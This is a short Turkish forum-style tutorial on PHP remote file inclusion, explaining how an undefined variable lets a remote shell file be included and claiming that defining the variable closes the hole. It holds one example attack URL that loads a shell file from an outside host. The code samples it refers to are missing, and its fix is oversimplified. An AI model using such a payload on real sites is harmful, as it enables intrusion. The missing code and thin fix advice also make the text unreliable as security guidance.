PHP Remote File İnclusion[Döküman]
-
Evet arkadaşlar bugün size rfi(remote file inclusion) yani uzakdan zararlı dosya çagırmayı ve bu açıkları nasıl kapatıcagımızı anlatıcam.
Aşagıdaki kod da rfi (remote file inclusion) mevcutdur.
Evet gördüğünüz gibi $k4ndemir değişken'i tanımlanmamış ve böyle bir açık çıkmış ortaya.
siteadresi.com/index.php?k4ndemir=http://sh3ll.txt?
ile uzakdaki zararlı dosyayı çagırıp siteye zarar verebilirler.
Ancak bu açığı kolayca kapatabiliriz.
$k4ndemir değişkenini tanımlamamız yeterli olucaktır.
Aşagıdaki kod da görebilirsiniz;
evet bu kadar arkadaşlar insallah yardımcı olmuşumdur.
bunu bir hacking dokumanı olarak algılamayın , isteyen algılasın :D
-
aynı dökümanın gelişmişini 3 sene önce hazırlamıştım.açıkları daha mantıklıydı.
Toplam Hit: 915 Toplam Mesaj: 2
